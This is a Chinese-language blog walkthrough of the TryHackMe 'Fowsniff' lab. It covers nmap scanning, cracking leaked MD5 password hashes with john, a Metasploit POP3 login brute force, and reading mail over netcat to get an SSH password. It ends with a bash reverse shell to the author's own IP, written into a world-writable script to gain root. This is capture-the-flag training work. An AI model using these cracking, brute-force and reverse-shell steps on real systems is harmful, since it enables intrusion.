THM-Fowsniff

本文最后更新于 2025年1月18日 凌晨

前置用openvpn连接,具体可以看thm的教程,连不上可以走代理,我用的美国的。

nmap先扫一下端口

1
nmap -T4 -A -v 10.10.63.96
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Fowsniff Corp - Delivering Solutions
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: UIDL SASL(PLAIN) USER CAPA AUTH-RESP-CODE TOP PIPELINING RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS more have SASL-IR post-login listed capabilities ID IMAP4rev1 Pre-login OK
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=1/17%OT=22%CT=1%CU=38918%PV=Y%DS=3%DC=T%G=Y%TM=678A67F
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:05%GCD=1%ISR=109%TI=Z%CI=I%TS=8)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)
OS:SEQ(SP=108%GCD=1%ISR=109%TI=Z%CI=I%TS=8)SEQ(SP=FB%GCD=2%ISR=104%TI=Z%CI=
OS:I%TS=8)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%
OS:O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W
OS:6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF55%RUD=G)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF5F%RUD=G)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF79%RUD=G)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AF9F%RUD=G)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=AFA6%RUD=G)IE(R=N)

Uptime guess: 198.049 days (since Wed Jul  3 21:13:58 2024)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   0.19 ms   172.17.16.1
2   360.21 ms 10.8.0.1
3   360.96 ms 10.10.63.96

扫到了22,80,110,143四个端口

1
nmap --script=vuln -p22,80,110,143 10.10.63.96

扫一下漏洞没有东西,直接先去看80端口

1

说明遭到了数据泄露,劫持了官网发布了敏感信息,信息打点一下。

网址,按道理是这个地方,里面的内容应该是

2

泄露了email passwords,存储一下

1
2
3
4
5
6
7
8
9
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

用rockyou.txt爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt  pop.txt
Using default input encoding: UTF-8
Loaded 8 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=32
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2       (seina@fowsniff)
orlando12        (parede@fowsniff)
apples01         (tegel@fowsniff)
skyler22         (baksteen@fowsniff)
mailcall         (mauer@fowsniff)
carp4ever        (mursten@fowsniff)
bilbo101         (mustikka@fowsniff)
7g 0:00:00:00 DONE (2025-01-17 22:58) 16.27g/s 33356Kp/s 33356Kc/s 79672KC/s  filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

将信息分别保存一下

1
cat pop.txt |awk -F ' '  '{print $1}' >pop3pass.txt

再保存一下账号信息

1
cat pop.txt |awk -F ' '  '{print $2}'|awk -F '@' '{print $1}'|awk -F '(' '{print $2}' >pop3cred.txt

Hydra 是一个非常流行的密码破解工具,支持多种协议(如HTTP, FTP, SSH等)的暴力破解。它可以通过暴力穷举密码来尝试登录并破解目标服务的密码。(没使用成功

所以根据题目

使用您捕获的用户名和密码,您可以使用 metasploit 暴力破解 pop3 登录吗?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf6 auxiliary(scanner/pop3/pop3_login) > set RHOSTS 10.10.63.96
RHOSTS => 10.10.63.96
msf6 auxiliary(scanner/pop3/pop3_login) >  set RPORT 110
RPORT => 110
msf6 auxiliary(scanner/pop3/pop3_login) >  set USER_FILE pop3cred.txt
USER_FILE => pop3cred.txt
msf6 auxiliary(scanner/pop3/pop3_login) > set PASS_FILE pop3pass.txt
PASS_FILE => pop3pass.txt
msf6 auxiliary(scanner/pop3/pop3_login) > run
[+] 10.10.63.96:110       - 10.10.63.96:110 - Success: 'seina:scoobydoo2' '+OK Logged in.  '
[!] 10.10.63.96:110       - No active DB -- Credential data will not be saved!
[-] 10.10.63.96:110       - 10.10.63.96:110 - Failed: 'parede:scoobydoo2', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110       - 10.10.63.96:110 - Failed: 'parede:orlando12', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110       - 10.10.63.96:110 - Failed: 'parede:apples01', '-ERR [AUTH] Authentication failed.'
[-] 10.10.63.96:110       - 10.10.63.96:110 - Failed: 'parede:skyler22', ''

说明seina的密码还没有改,尝试连接

1
2
3
4
5
6
7
8
9
10
11
12
┌──(orange㉿Coyano)-[/mnt/c/Users/0raN9e/Desktop]
└─$ nc 10.10.63.96 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.

然后看看内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
list
+OK 2 messages:
1 1622
2 1280
.
repr 1
-ERR Unknown command: REPR
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone


.
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.

.

通过阅读文章可以发现暂时密钥是S1ck3nBluff+secureshell,第二封邮件说了baksteen,没来得及读文件,ssh还没有改

可以登录上去

1
2
3
4
5
baksteen@fowsniff:~$ ls
Maildir  term.txt
baksteen@fowsniff:~$ cat te*
I wonder if the person who coined the term "One Hit Wonder" 
came up with another other phrases.

没什么东西,尝试看看提权

1
2
3
4
5
baksteen@fowsniff:~$ sudo -l
[sudo] password for baksteen: 
Sorry, user baksteen may not run sudo on fowsniff.
baksteen@fowsniff:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)

找看看可写文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
baksteen@fowsniff:~$ find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null
/opt/cube/cube.sh
/home/baksteen/.cache/motd.legal-displayed
/home/baksteen/Maildir/dovecot-uidvalidity
/home/baksteen/Maildir/dovecot.index.log
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff
/home/baksteen/Maildir/dovecot-uidlist
/home/baksteen/.viminfo
/home/baksteen/.bash_history
/home/baksteen/.lesshsQ
/home/baksteen/.bash_logout
/home/baksteen/term.txt
/home/baksteen/.profile
/home/baksteen/.bashrc

发现有个sh文件,去看看

1
2
3
4
5
baksteen@fowsniff:/opt/cube$ ls -al
total 12
drwxrwxrwx 2 root   root  4096 Mar 11  2018 .
drwxr-xr-x 6 root   root  4096 Mar 11  2018 ..
-rw-rwxr-- 1 parede users  851 Mar 11  2018 cube.sh

看一下是简单打印东西的

弹个shell看看(wsl没网卡,所以用到cmd弹的,下载nc)

1
bash -c 'bash -i >& /dev/tcp/10.8.11.245/5566 0>&1'
1
2
ssh baksteen@10.10.63.96
S1ck3nBluff+secureshell

再次启动,找flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
root@fowsniff:/root# ls
ls
Maildir
flag.txt
root@fowsniff:/root# cat flag.txt
cat flag.txt
   ___                        _        _      _   _             _
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
               |___/

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.

渗透
#提权 #信息收集
THM-Fowsniff
https://0ran9ewww.github.io/2025/01/18/渗透/Fowsniff/
作者
orange
发布于
2025年1月18日
更新于
2025年1月18日
许可协议